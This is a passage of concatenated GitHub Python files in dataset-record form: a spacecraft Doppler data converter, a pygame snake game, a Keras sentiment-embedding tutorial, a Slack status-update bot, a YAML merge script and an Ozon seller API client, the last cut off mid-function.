coordonnée généré avant, reshape modifie la dimension, cela va créer un tableau de 40 éléments dont les 20 
premiers sont 0 et les autres 1, les datas étant \n# classés par ordre (malade puis safe), les malades seront en bleu et les autres en rouge (selon la cmap)\n\n# return features, targets\n\n# if __name__ == '__main__':\n#     features, targets = get_dataset()\n#     # Plot points\n#     plt.scatter(features[:, 0], features[:, 1], s=40, c=targets, cmap=plt.cm.Spectral) # scatter : nuage de pointe, [:, 0] = colomne 0 de feature, colomone 1 de feature\n#     plt.show()\n\n####","repo_name":"vaboston/numpy-1st","sub_path":"createExempleData.py","file_name":"createExempleData.py","file_ext":"py","file_size_in_byte":5444,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72822202552","text":"\"\"\" \n\nDoppler class\n\nUsing phase count information from the ATDF file, this class builds and outputs One-Way-Doppler,\nTwo-Way-Doppler, and Three-Way-Doppler observables in Ascii format.\n\nAUTHOR:\n\n    Dr. Ashok Kumar Verma (1,2)\n    1. Department of Earth, Planetary, and Space Sciences\n       University of California, Los Angeles, 90095, CA, USA.\n    2. NASA Goddard Space Flight Center, Greenbelt, 20771, MD, USA.\n    \n    Contact: ashokkumar.verma@nasa.gov\n\n\"\"\"\n\nimport functions as fn\nimport numpy as np\n\n# ===========================================================================\nfrom functions import dic_attrs\n\n\ndef store_record(rec: dict,\n                 next_rec_at: str,\n                 count_time: float) -> dic_attrs:\n    \"\"\"\n    Save current record in the dictionary.\n    \n    Args:\n        rec: The record to save.\n        next_rec_at: The expected time of the next record.\n        count_time: The count time.\n\n    Returns: Data dictionary.\n\n    \"\"\"\n    data = fn.dic_attrs(rec=None, next_rec_at=None, count_time=None)\n    data.rec = rec\n    data.next_rec_at = next_rec_at\n    data.count_time = count_time\n    \n    return data\n\n\n# ===========================================================================\nclass Doppler:\n    \"\"\"\n    Using phase count information from the ATDF file, this class builds and outputs One-Way-Doppler,\n    Two-Way-Doppler, and Three-Way-Doppler observables in Ascii format.\n    \n    \"\"\"\n    \n    # -----------------------------------------------------------------------\n    def __init__(self, doppler_recs: list,\n                 transponder_freq: float,\n                 dtype: int,\n                 count_time: float,\n                 out_file: object,\n                 ramp_data: list):\n        \"\"\"\n        \n        Args:\n            doppler_recs: List of Doppler records.\n            transponder_freq: Transponder frequency.\n            dtype: Data type.\n            count_time: The count time.\n            out_file: Path to the output file.\n            ramp_data: Path to the ramp data file (CSV columns: start, end, transmitter, band).\n        \"\"\"\n        self.recs = doppler_recs\n        self.data_type = dtype\n        self.count_time = count_time\n        self.transponder_freq = transponder_freq\n        self.out_file = out_file\n        self.ramp_band = None\n        self.ramp_xmtr = None\n        self.ramp_end = None\n        self.ramp_start = None\n        self.read_ramp(ramp_data)\n    \n    # -----------------------------------------------------------------------\n    def read_ramp(self, ramp_data: str):\n        \"\"\"\n        Read ramp data to get transmitter for 3-Way Doppler.\n\n        Args:\n            ramp_data: Path to the ramp data file.\n\n        \"\"\"\n\n        if not len(ramp_data): return \n        try:\n            data = np.loadtxt(ramp_data, dtype=str, delimiter=',', ndmin=2)\n            self.ramp_start = np.array([fn.str2datetime(d.strip()) for d in data[:, 0]])\n            self.ramp_end = np.array([fn.str2datetime(d.strip()) for d in data[:, 1]])\n            self.ramp_xmtr = np.array([d.strip() for d in data[:, 2]])\n            self.ramp_band = np.array([d.strip() for d in data[:, 3]])\n        except Exception as e: \n            msg = 'Unable to read data from ramp file:\\nRamp file : %s\\n' % ramp_data\n            fn.raise_warning(msg)\n
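        # note: a parse failure leaves self.ramp_* as None, so get_xmtr() below simply finds no 3-Way matches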
\n # -----------------------------------------------------------------------\n def get_xmtr(self, time_tag: str,\n band: str,\n stn: str):\n \n stn = 'DSS %s' % stn\n \n # for 1-Way\n if self.data_type == 1: return \"S/C\"\n \n # for 2-Way\n if self.data_type == 2: return stn\n \n # for 3-Way\n # get transmitter station, if time tag falls between start and end time,\n # and uplink band equals to the ramp band, and rcvr not equal to xmtr.\n if self.ramp_start is None or self.ramp_end is None or \\\n self.ramp_band is None or self.ramp_xmtr is None: return None\n map = (time_tag >= self.ramp_start) & (time_tag < self.ramp_end) & \\\n (self.ramp_band == band) & (self.ramp_xmtr != stn)\n xmtr = self.ramp_xmtr[map]\n \n if xmtr.size: return xmtr[0]\n return None\n \n # -----------------------------------------------------------------------\n def convert(self, rec: dict,\n start_doppler: dict,\n count_time: float) -> dict:\n \"\"\"\n This function checks and stores new start record for each station according to\n uplink and downlink bands. If start record already exists, then it converts records\n to the observables and replace start record with the current record.\n \n Args:\n rec: The ith Doppler record.\n start_doppler: The start record of the Doppler.\n count_time: The count time.\n\n Returns: Updated record of Doppler\n\n \"\"\"\n \n # getting time tag, station and band records.\n time_tag = fn.str2datetime(rec['time_tag'])\n station = fn.is_dsn_valid(rec, data_type=self.data_type_name())\n ul = rec['uplink_band']\n dl = rec['dnlink_band']\n \n # return if invalid DSN station encounters\n if station is None: return start_doppler\n \n # get transmitter\n xmtr = self.get_xmtr(time_tag, ul, station)\n if xmtr is None: return start_doppler\n \n # creating record key according to the DSN station\n # unlink- and downlink-band.\n rec_key = station + ul + dl\n \n # store start record as the former record\n former_rec = start_doppler[rec_key]\n \n # check count time units\n if count_time >= 1.0 and former_rec.rec is None:\n ms = time_tag.microsecond\n sec = time_tag.second\n \n # store record if no previous record found for the record key\n if former_rec.rec is None:\n next_rec_at = fn.add_time(time_tag, sec=count_time, dtType=True)\n former_rec = store_record(rec, next_rec_at, count_time)\n start_doppler.update({rec_key: former_rec})\n return start_doppler\n \n # convert records to observables if former record is not None\n # and all other conditions are also met.\n if time_tag == former_rec.next_rec_at and \\\n station == former_rec.rec['station'] and \\\n ul == former_rec.rec['uplink_band'] and \\\n dl == former_rec.rec['dnlink_band'] and \\\n rec['channel_number'] == former_rec.rec['channel_number']:\n self.write_msr(former_rec, rec, station, xmtr, count_time)\n next_rec_at = fn.add_time(time_tag, sec=count_time, dtType=True)\n former_rec = store_record(rec, next_rec_at, count_time)\n start_doppler.update({rec_key: former_rec})\n return start_doppler\n \n # if time tag is not as expected then reset the former records.\n if time_tag > former_rec.next_rec_at:\n former_rec = store_record(None, None, None)\n start_doppler.update({rec_key: former_rec})\n return start_doppler\n \n return start_doppler\n \n # -----------------------------------------------------------------------\n def get_ref_freq(self, rec: dict):\n \"\"\"\n\n Args:\n rec: The Doppler record.\n\n Returns: Reference frequency\n\n \"\"\"\n freq = rec['doppler_ref_freq']\n ul = rec['uplink_band']\n dl = rec['dnlink_band']\n stn = 
rec['station']\n rcvr_type = rec['doppler_rcvr_type']\n \n # get frequency multiplier\n fac = fn.get_mul_fac(freq)\n if fac == 0:\n msg = \"\\nInvalid reference frequency, %s MHz, at time %s.\\n Expected around 22MHz.\\n\" \\\n + \"Skipping this record.\\n\"\n fn.raise_warning(msg % (freq / fn.MHz, rec['time_tag']))\n return False\n \n freq = freq / fac\n \n # for 1-way Doppler\n if self.data_type == 1:\n \n if freq > 22e6:\n ul = 'S'\n else:\n ul = dl\n \n # S-band uplink frequency\n # Moyer, Equation 13-1, section 13.2.1)\n if ul == \"S\":\n ref_freq = 96.0 * freq\n \n # X-band frequency\n # Moyer, Equation 13-2/4, section 13.2.1)\n elif ul == \"X\":\n if stn in ['15', '45', '65'] and rcvr_type != 5:\n freq = 4.68125 * freq - 81.4125e6\n ref_freq = 32.0 * freq + 6.5e9\n \n # for Ka band\n elif ul == \"Ka\":\n ref_freq = 1000.0 * freq + 1e10\n \n # for all others band\n else:\n msg = '=' * 80 + \\\n '\\n~*~*~ The given reference frequency is not at the sky level ~*~*~' \\\n '\\nAt the moment, program is unable to compute the sky frequency at:' \\\n '\\nTime Tag: %s UTC' \\\n '\\nStation: DSS %s' \\\n '\\nUplink Band: %s' \\\n '\\nReference Freq: %s Hz\\n' + '=' * 80\n fn.raise_warning(msg % (rec['time_tag'], rec['station'], ul, rec['doppler_ref_freq']))\n return False\n \n return ref_freq\n \n # -----------------------------------------------------------------------\n def data_type_name(self):\n \"\"\"\n Convert int data type to string.\n Returns: String value of the data type.\n\n \"\"\"\n if self.data_type == 1: return '1-Way-Doppler'\n if self.data_type == 2: return '2-Way-Doppler'\n if self.data_type == 3: return '3-Way-Doppler'\n \n # -----------------------------------------------------------------------\n def write_msr(self,\n former_rec: dict,\n rec: dict,\n rcvr: str,\n xmtr: str,\n count_time: float):\n \"\"\"\n Write observables into ascii table.\n Args:\n former_rec: The Doppler record.\n rec: The current Doppler record.\n rcvr: The name of the receiver.\n xmtr: The name of the transmitter.\n count_time: The count time.\n\n \"\"\"\n # get uplink and downlink bands\n uplink_band = rec['uplink_band']\n dnlink_band = rec['dnlink_band']\n \n # get average delays\n sc_delay = 0.5 * (rec['sc_delay'] + former_rec.rec['sc_delay'])\n xmtr_delay = rec['exciter_stn_delay']\n rcvr_delay = rec['rcvr_stn_delay']\n \n # get average doppler bias (Moyer, Equation 13-22, section 13.3.1)\n C4 = rec['doppler_bias']\n \n # get doppler shift\n doppler_count_t2 = rec['doppler_count']\n doppler_count_t1 = former_rec.rec['doppler_count']\n \n # get change in the doppler cycles which accumulates during the count interval\n # (Moyer, first part of the right-hand Equation 13-26, DeltaN/Tc)\n delta_n_tc = (doppler_count_t2 - doppler_count_t1) / count_time\n \n # get middle time of two doppler counts \n time_tag = fn.add_time(fn.str2datetime(former_rec.rec['time_tag']), sec=count_time * 0.5)\n \n # get reference frequency\n # -- get exciter band if reference freq. is given at the sky level\n rcvr_exciter_band = fn.msr_band(rec['doppler_ref_freq'])\n \n if rcvr_exciter_band is not None:\n # -- get reference freq. if given at the sky level.\n ref_freq = rec['doppler_ref_freq']\n # -- get exciter band if reference freq. 
is not given at the sky level.\n else:\n # -- get exciter band if turnaround ratio is given\n if rec[\"turnaround_ratio_num\"] != 0 and rec[\"turnaround_ratio_den\"] != 0:\n rcvr_exciter_band = fn.find_exciter_band(rec[\"turnaround_ratio_num\"] / rec[\"turnaround_ratio_den\"])\n \n # -- if turnaround ratio is not given, set exciter band to uplink band.\n else:\n rcvr_exciter_band = uplink_band\n \n # -- compute reference freq. if not given at the sky level.\n ref_freq = self.get_ref_freq(rec)\n \n f_bias = 0\n if ref_freq:\n # get frequency bias (Moyer, Equation 13-28, section 13.3.1)\n if self.data_type == 1:\n f_bias = 0\n C2 = fn.c_2(dnlink_band)\n M2 = fn.m_2(fn.msr_band(ref_freq), dnlink_band)\n f_bias = M2 * ref_freq - C2 * self.transponder_freq + C4\n ref_freq = self.transponder_freq\n else:\n f_bias = C4\n \n if not abs(delta_n_tc): return\n \n # get doppler observables (Moyer, Equation 13-26)\n observed = delta_n_tc - abs(f_bias)\n if C4 != 0.0: observed = C4 / abs(C4) * observed\n \n # corrections, in the case of a modulo reset\n reset = round(observed * count_time / 2 ** 32)\n if reset:\n if observed > 0:\n observed = observed - 2 ** 32 / count_time\n else:\n observed = observed + 2 ** 32 / count_time\n \n # write output\n rcvr = 'DSS %s' % rcvr\n if count_time == former_rec.count_time:\n self.out_file.write(\n \"%27s, %15s, %5s, %10s, %10s, %5s, %5s, %5s, %5s, %10s, %10s, %25.10f, %25.10f, %15.6f, %15.6f, \"\n \"%15.6f\\n\" \\\n % (time_tag,\n self.data_type_name(),\n rec['sc_id'],\n xmtr,\n rcvr,\n rec['channel_number'],\n uplink_band,\n dnlink_band,\n rcvr_exciter_band,\n count_time,\n rec['lwt_rng_component'],\n observed,\n ref_freq,\n xmtr_delay * fn.sec2nanosec,\n rcvr_delay * fn.sec2nanosec,\n sc_delay * fn.sec2nanosec,\n )\n )\n \n # -----------------------------------------------------------------------\n def doppler_table(self):\n \"\"\"\n \n Converts binary Doppler records into ascii table.\n \n \"\"\"\n \n # set empty start record\n start_doppler = fn.rec_dict(\n fn.dic_attrs(rec=None,\n next_rec_at=None,\n count_time=None,))\n \n # get all doppler records\n size = len(self.recs)\n if size > 0:\n \n # set update progress\n umsg = \"Extracting %s\" % (self.data_type_name())\n prog = fn.progressBar()\n prog.start(1, umsg)\n \n # write a header of the output file.\n self.out_file.write(\n \"%s %25s, %15s, %5s, %10s, %10s, %5s, %5s, %5s, %5s, %10s, %10s, %25s, %25s, %15s, %15s, %15s\\n\" \\\n % (\"#\", \"time_tag (UTC)\", \"Data Type\", \"scID\", \"Xmtr\", \"Rcvr\", \"Chnl\", \"UL\", \"DL\", \"Ex\", \"CT (sec)\",\n \"Rng-LC\", \"Observed (Hz)\", \"Ref-Freq (Hz)\", \"XmtrDly (nsec)\", \"RcvrDly (nsec)\", \"ScDly (nsec)\"))\n \n # loop through every record.\n i = 0\n for rec in self.recs:\n \n # set count time.\n if self.count_time is None:\n count_time = rec['count_time']\n else:\n if rec['count_time'] in self.count_time:\n count_time = rec['count_time']\n else:\n count_time = self.count_time[-1]\n \n start_doppler = self.convert(rec, start_doppler, count_time)\n prog.setStep(i / size)\n prog.stop()\n \n # ===========================================================================\n","repo_name":"ashokverma24/atdf2ascii","sub_path":"src/Doppler.py","file_name":"Doppler.py","file_ext":"py","file_size_in_byte":15971,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"95"} +{"seq_id":"12521573202","text":"\ndef my_func(x,y,z=20):\n return x + y + z\n\nlist1 = ['first ', 'second ', 'third ']\n\nprint(my_func(*list1))\n\nmy_dict = {\n 
'x': 'value1',\n 'y': 'value2',\n 'z': 'value3',\n}\n\nprint(my_func(**my_dict))\n\n","repo_name":"grenn72/pynet-ons-feb19","sub_path":"day1/my_func_ex2.py","file_name":"my_func_ex2.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"34663926223","text":"import pygame\nfrom pygame.locals import *\nimport time\nimport random\n\n# objects y snake con 40px\nfrom connection import *\n\nSIZE = 40\n\n\n# pygame.init()\n\n\nclass Object:\n def __init__(self, parent_screen, imagen, imagen2, bad):\n self.parent_screen = parent_screen\n self.image1 = pygame.image.load(f\"images/{imagen}\").convert_alpha()\n self.image2 = pygame.image.load(f\"images/{imagen2}\").convert_alpha()\n self.bad = pygame.image.load(f\"images/{bad}\").convert_alpha()\n\n # posicion de inicio del objeto 1\n self.x = SIZE * 4\n self.y = SIZE * 4\n\n # posicion de inicio del objeto 2\n self.x2 = SIZE * 14\n self.y2 = SIZE * 14\n\n # posicion de malo\n self.x3 = SIZE * 16\n self.y3 = SIZE * 16\n\n def draw(self):\n # pinto los objects en sus posiciones\n self.parent_screen.blit(self.image1, (self.x, self.y))\n self.parent_screen.blit(self.image2, (self.x2, self.y2))\n self.parent_screen.blit(self.bad, (self.x3, self.y3))\n pygame.display.flip() # updating the screen\n\n def moveObject1(self):\n # ubicaciones donde queremos que se ubiquen los objects en aleatorio\n self.x = random.randint(1, 24) * SIZE\n self.y = random.randint(1, 19) * SIZE\n\n self.x3 = random.randint(1, 24) * SIZE\n self.y3 = random.randint(1, 19) * SIZE\n\n def moveObject2(self):\n self.x2 = random.randint(1, 24) * SIZE\n self.y2 = random.randint(1, 19) * SIZE\n\n self.x3 = random.randint(1, 24) * SIZE\n self.y3 = random.randint(1, 19) * SIZE\n\n def moveObject3(self):\n self.x3 = random.randint(1, 24) * SIZE\n self.y3 = random.randint(1, 19) * SIZE\n\n\nclass Snake:\n\n def __init__(self, parent_screen, length, fondo, face):\n self.length = length\n self.parent_screen = parent_screen\n '''self.color1 = color1\n self.color2 = color2\n self.color3 = color3'''\n self.face = face\n\n self.fondo1 = pygame.image.load(f\"images/{fondo}\").convert()\n\n # imagenes de la serpiente, cuerpo y cola.\n self.block = pygame.image.load(\"images/snake40.jpg\").convert()\n self.face1 = pygame.image.load(f\"images/{face}\").convert()\n # self.blockeyes = pygame.image.load(\"images/snakeojos.jpg\").convert()\n # self.blockmask = pygame.image.load(\"images/snakeojosmask.jpg\").convert()\n self.blockcola = pygame.image.load(\"images/cola5.jpg\").convert()\n self.x = [SIZE] * length\n self.y = [SIZE] * length\n\n self.direction = 'down'\n\n def increase_length(self):\n self.length += 1\n self.x.append(-1)\n self.y.append(-1)\n\n def move_left(self):\n if self.direction != \"right\":\n self.direction = 'left'\n\n def move_right(self):\n if self.direction != \"left\":\n self.direction = 'right'\n\n def move_up(self):\n if self.direction != \"down\":\n self.direction = 'up'\n\n def move_down(self):\n if self.direction != \"up\":\n self.direction = 'down'\n\n def draw(self):\n self.parent_screen.blit(self.fondo1, (0, 0))\n self.parent_screen.blit(self.face1, (self.x[0], self.y[0]))\n # pintamos la sepriente\n for i in range(1, self.length - 1):\n self.parent_screen.blit(self.block, (self.x[i], self.y[i]))\n # pintamos la cola.\n self.parent_screen.blit(self.blockcola, (self.x[-1], self.y[-1]))\n pygame.display.flip() # updating the screen\n\n def walk(self):\n for i in range(self.length - 1, 
0, -1):\n self.x[i] = self.x[i - 1]\n self.y[i] = self.y[i - 1]\n\n # coordenadas de pared, si llega se choca y gameover\n if self.direction == 'left':\n self.x[0] -= SIZE\n if self.x[0] < 0:\n Game.show_game_over()\n\n if self.direction == 'right':\n self.x[0] += SIZE\n if self.x[0] > 1000:\n Game.show_game_over()\n\n if self.direction == 'up':\n self.y[0] -= SIZE\n if self.y[0] < 0:\n Game.show_game_over()\n\n if self.direction == 'down':\n self.y[0] += SIZE\n if self.y[0] > 800:\n Game.show_game_over()\n\n self.draw()\n\n\nclass Game:\n def __init__(self, user_text, fondo1, imagen, imagen2, bad, face1):\n # print(n1)\n '''self.n1 = n1\n self.n2 = n2\n self.n3 = n3'''\n self.user_text = user_text\n self.fondo1 = fondo1\n self.imagen = imagen\n self.imagen2 = imagen2\n self.bad = bad\n self.face1 = face1\n self.contador = 5\n self.cursor = db.cursor()\n\n # pygame.init()\n # tamaño de la apntalla\n self.surface = pygame.display.set_mode((1000, 800))\n self.surface.blit(pygame.image.load(f\"images/{fondo1}\").convert(), [0, 0])\n\n # musica fondo\n pygame.mixer.init()\n # self.play_background_music()\n #print(\"game : \", self.user_text)\n pygame.display.set_caption(\"SERPIENCOVID GAME\")\n # self.surface.fill((n1, n2, n3))\n self.snake = Snake(self.surface, 2, fondo1, face1)\n self.snake.draw()\n self.object = Object(self.surface, imagen, imagen2, bad)\n self.object.draw()\n\n @staticmethod\n # colisiones\n def is_collision(x1, y1, x2, y2):\n if x2 <= x1 < x2 + SIZE:\n if y2 <= y1 < y2 + SIZE:\n return True\n return False\n\n '''def play_background_music(self):\n pygame.mixer.music.load(\"sounds/bg_music_1.mp3\")\n pygame.mixer.music.play()'''\n\n def play_sound(self, sound):\n sound = pygame.mixer.Sound(f\"{sound}.mp3\")\n pygame.mixer.Sound.play(sound)\n\n def play(self):\n\n self.snake.walk()\n self.object.draw()\n self.display_score()\n pygame.display.flip()\n\n # snake collision wiht the object1\n if self.is_collision(self.snake.x[0], self.snake.y[0], self.object.x, self.object.y):\n self.play_sound(\"sounds/ding\")\n # print(\"Colission\")\n self.snake.increase_length()\n self.object.moveObject1()\n\n # snake collision wiht the object2\n if self.is_collision(self.snake.x[0], self.snake.y[0], self.object.x2, self.object.y2):\n self.play_sound(\"sounds/ding\")\n # print(\"Colission\")\n self.snake.increase_length()\n self.object.moveObject2()\n\n if self.is_collision(self.snake.x[0], self.snake.y[0], self.object.x3, self.object.y3):\n self.play_sound(\"sounds/crash\")\n self.contador = self.contador - 1\n # print(self.contador)\n # self.snake.reduce_length()\n self.object.moveObject3()\n\n # snake colLiding with itself\n for i in range(3, self.snake.length):\n if self.is_collision(self.snake.x[0], self.snake.y[0], self.snake.x[i], self.snake.y[i]):\n self.play_sound(\"sounds/crash\")\n raise Exception(\"Collision occured\")\n\n def show_game_over(self):\n # fondo de pantalla para cuando gameover\n self.surface.fill((216, 115, 112))\n base_font100 = pygame.font.Font(\"SF Hollywood Hills.ttf\", 100)\n base_font50 = pygame.font.Font(\"SF Hollywood Hills Italic.ttf\", 50)\n line1 = base_font100.render(f\"Game is over!\", True, (255, 255, 255))\n line2 = base_font50.render(f\"Your score is {self.snake.length}\", True, (255, 255, 255))\n len0 = base_font50.render(\"OUCH! You can do it better!\", True, (255, 255, 255))\n len10 = base_font50.render(\"Ohh!! Good game!!\", True, (255, 255, 255))\n len15 = base_font50.render(\"WOWW! How long have you been practicing? 
You are a crack!!\", True, (255, 255, 255))\n if self.snake.length < 7:\n self.surface.blit(len0, (225, 300))\n elif self.snake.length < 15:\n self.surface.blit(len10, (225, 300))\n else:\n self.surface.blit(len15, (225, 300))\n\n self.surface.blit(line1, (225, 155))\n self.surface.blit(line2, (225, 400))\n line3 = base_font50.render(\"To play again press Enter.\", True, (255, 255, 255))\n line4= base_font50.render(\"To exit press Escape!\", True, (255, 255, 255))\n self.surface.blit(line3, (225, 500))\n self.surface.blit(line4, (225, 550))\n\n updatePoints = \"\"\"UPDATE ranking SET points = points + %s WHERE nameUser = %s\"\"\"\n val2 = (self.snake.length, self.user_text)\n self.cursor.execute(updatePoints, val2)\n db.commit()\n pygame.display.flip()\n pygame.mixer.music.pause()\n\n def reset(self):\n # reset de los objects y de la sepriente para que empiece de 0\n self.snake = Snake(self.surface, 2, self.fondo1, self.face1)\n self.object = Object(self.surface, self.imagen, self.imagen2, self.bad)\n\n def display_score(self):\n # puntos por partida, insertar bbdd\n base_font40 = pygame.font.Font(\"SF Hollywood Hills Italic.ttf\", 40)\n score = base_font40.render(f\"Score: {self.snake.length - 2}\", True, (255, 255, 255))\n self.surface.blit(score, (830, 10))\n\n lives = base_font40.render(f\"Lives: {self.contador}\", True, (255, 255, 255))\n self.surface.blit(lives, (20, 10))\n\n if self.contador == 0:\n raise Exception(\"Collision occured\")\n\n def run(self, tiempo):\n running = True\n pause = False\n\n while running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n if event.key == K_RETURN:\n pygame.mixer.music.unpause()\n pause = False\n\n if not pause:\n if event.key == K_UP:\n self.snake.move_up()\n\n if event.key == K_DOWN:\n self.snake.move_down()\n\n if event.key == K_LEFT:\n self.snake.move_left()\n\n if event.key == K_RIGHT:\n self.snake.move_right()\n\n elif event.type == QUIT:\n running = False\n try:\n if not pause:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause = True\n self.reset()\n time.sleep(tiempo)\n","repo_name":"iaparicioz/final1","sub_path":"juego.py","file_name":"juego.py","file_ext":"py","file_size_in_byte":10558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8850799202","text":"#!/usr/bin/env python\nimport sys\nimport yaml\n\n\ndef main():\n fin, fadd, fout = sys.argv[1:4]\n with open(fin, 'r') as f:\n config = yaml.load(f.read(), yaml.SafeLoader)\n with open(fadd, 'r') as f:\n config.update(yaml.load(f.read(), yaml.SafeLoader))\n with open(fout, 'w') as f:\n yaml.dump(config, f)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"covidvis/covid19-vis","sub_path":"scripts/transform-config.py","file_name":"transform-config.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"72541936313","text":"from tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Embedding, LSTM\nimport numpy as np\n\ndocs = ['너무 재밌어요', '참 최고에요', '참 잘 만든 영화에요', '추천하고 싶은 영화입니다.', \n '한 번 더 보고 싶네요', '글쎄요', '별로에요', '생각보다 지루해요', '연기가 어색해요', \n '재미없어요', '너무 재미없다', '참 재밌네요', '청순이가 잘 생기긴 했어요']\n\n# positive token: 1 / negative token: 0\nlabels = np.array([1, 1, 1, 1, 1, 0, 0, 0, 
0, 0, 0, 1, 1])\n\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(docs)\n# {'참': 1, '너무': 2, '잘': 3, '재밌어요': 4, '최고에요': 5, '만든': 6, '영화에요': 7, \n# '추천하고': 8, '싶은': 9, '영화입니다': 10, '한': 11, '번': 12, '더': 13, '보고': 14, \n# '싶네요': 15, '글쎄요': 16, '별로에요': 17, '생각보다': 18, '지루해요': 19, '연기가': 20, \n# '어색해요': 21, '재미없어요': 22, '재미없다': 23, '재밌네요': 24, '청순이가': 25, \n# '생기긴': 26, '했어요': 27}\n\nx = tokenizer.texts_to_sequences(docs)\n# [[2, 4], [1, 5], [1, 3, 6, 7], [8, 9, 10], [11, 12, 13, 14, 15], \n# [16], [17], [18, 19], [20, 21], [22], [2, 23], [1, 24], [25, 3, 26, 27]]\n# pad_x = pad_sequences(x, maxlen=max(map(lambda x: len(x), x)), padding='pre')\npad_x = pad_sequences(x, maxlen=5, padding='post')\n# [[ 0 0 0 2 4]\n# [ 0 0 0 1 5]\n# [ 0 1 3 6 7]\n# [ 0 0 8 9 10]\n# [11 12 13 14 15]\n# [ 0 0 0 0 16]\n# [ 0 0 0 0 17]\n# [ 0 0 0 18 19]\n# [ 0 0 0 20 21]\n# [ 0 0 0 0 22]\n# [ 0 0 0 2 23]\n# [ 0 0 0 1 24]\n# [ 0 25 3 26 27]]\n\nimport tensorflow as tf\nstrategy = tf.distribute.MirroredStrategy(devices=['/gpu:0'])\nwith strategy.scope():\n model = Sequential()\n model.add(Embedding(input_dim=28, output_dim=11, input_length=5))\n # Embedding: encodes words to one-hot vector then map the vectors to 2D coordinate system.\n # input_dim: word_index+1 - 단어의 종류\n # input_length: 문장의 단어 개수\n # output_dim: arbitrary\n # if given as positional, input_dim, output_dim, input_length\n model.add(LSTM(32))\n model.add(Dense(1, activation='sigmoid'))\n # 1: positive, 0: negative\n\n\n# Model: \"sequential\"\n# _________________________________________________________________\n# Layer (type) Output Shape Param #\n# =================================================================\n# embedding (Embedding) (None, 5, 11) 308\n# _________________________________________________________________\n# lstm (LSTM) (None, 32) 5632\n# _________________________________________________________________\n# dense (Dense) (None, 1) 33\n# =================================================================\n# the number of parameters for Embedding layer:\n# > input_dim(the number of words)*output_dim(the number of nodes)\n# > Embedding layers output when args are given as (input_dim, output_dim), positional\n# > Output Shape: (None=batch_size, None=the number of sentence, output_dim=nodes)\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['acc'])\n model.fit(pad_x, labels, epochs=120, batch_size=16)\n\n acc = model.evaluate(pad_x, labels)[1]\n print('acc:', acc)\n# acc: 1.0","repo_name":"estela-park/AI_BitCamp","sub_path":"Keras_Modelling/keras52_1_Embedding.py","file_name":"keras52_1_Embedding.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31421997407","text":"from slackclient import SlackClient\nimport time\nimport feedparser as fp\nimport os\nimport string\n\nslack_token = os.environ[\"SLACK_BOT_TOKEN\"]\nsc = SlackClient(slack_token)\n\nupdates = open('updates.txt', 'r+')\nupdates.seek(40)\nguru_date = updates.read(19)\nupdates.seek(0)\n\n#Get updates from Guru\n\nd = fp.parse('http://status.getguru.com/history.rss')\nguru_text = str(d.entries[0])\nlatest_date = time.strftime('%Y-%m-%d %H:%M:%S', d.entries[0].published_parsed)\n#parse text\nguru_text = guru_text.split(\"
\")[1]\nguru_text = string.replace(guru_text, '', '')\nguru_text = string.replace(guru_text, '
', ' - ')\nguru_text = string.replace(guru_text, '', '*')\nguru_text = string.replace(guru_text, '', '*')\nguru_text = string.replace(guru_text, '

', '')\n#check if update is new\nif latest_date != guru_date:\n\t#post to slack\n\tsc.api_call(\n \t\"chat.postMessage\",\n \tchannel=\"#chat\",\n \ttext=(\"*Guru Status Update:* \" + guru_text)\n\t)\n\t#add date to updates.txt\n\tupdates.seek(40)\n\tupdates.write(latest_date)\n\nupdates.close()","repo_name":"ryandunlavy/service-status-updater","sub_path":"guru_status.py","file_name":"guru_status.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16146181502","text":"import io\nimport logging.config\nimport os\nimport re\nimport zipfile\nfrom environs import Env\n\nimport pandas as pd\nimport requests\n\nlogger = logging.getLogger(__file__)\n\n\ndef get_product_list(last_id, client_id, seller_token):\n \"\"\"Получить список товаров магазина озон.\n\n Делает API-запрос на сайт озон для получения списка товаров. Для корректного запроса необходим идентификатор клиента и идентификатор продавца.\n Фильтр настроен на отображения всех товаров с лимитом 1000.\n\n Аргументы:\n last_id (str): Последний идентификатор.\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значение:\n list: Список с информацией о товарах в каталоге\n\n Пример корректного исполнения функции:\n Корректный ответ от сайта озон - 200 и получение ответа в json формате\n\n Пример некорректного исполнения функции:\n Корректный ответ от сайта озон - 400\n\n \"\"\"\n url = \"https://api-seller.ozon.ru/v2/product/list\"\n headers = {\n \"Client-Id\": client_id,\n \"Api-Key\": seller_token,\n }\n payload = {\n \"filter\": {\n \"visibility\": \"ALL\",\n },\n \"last_id\": last_id,\n \"limit\": 1000,\n }\n response = requests.post(url, json=payload, headers=headers)\n response.raise_for_status()\n response_object = response.json()\n return response_object.get(\"result\")\n\n\ndef get_offer_ids(client_id, seller_token):\n \"\"\"Получить артикулы товаров магазина озон.\n\n Формерует список с информацией о товарах в каталоге и добавляет к нему артикул\n\n Аргументы:\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значе��ие:\n Список предложений\n\n Пример корректного исполнения функции:\n Не пустой список предложений\n\n Пример некорректного исполнения функции:\n Пустой список предложений\n\n \"\"\"\n last_id = \"\"\n product_list = []\n while True:\n some_prod = get_product_list(last_id, client_id, seller_token)\n product_list.extend(some_prod.get(\"items\"))\n total = 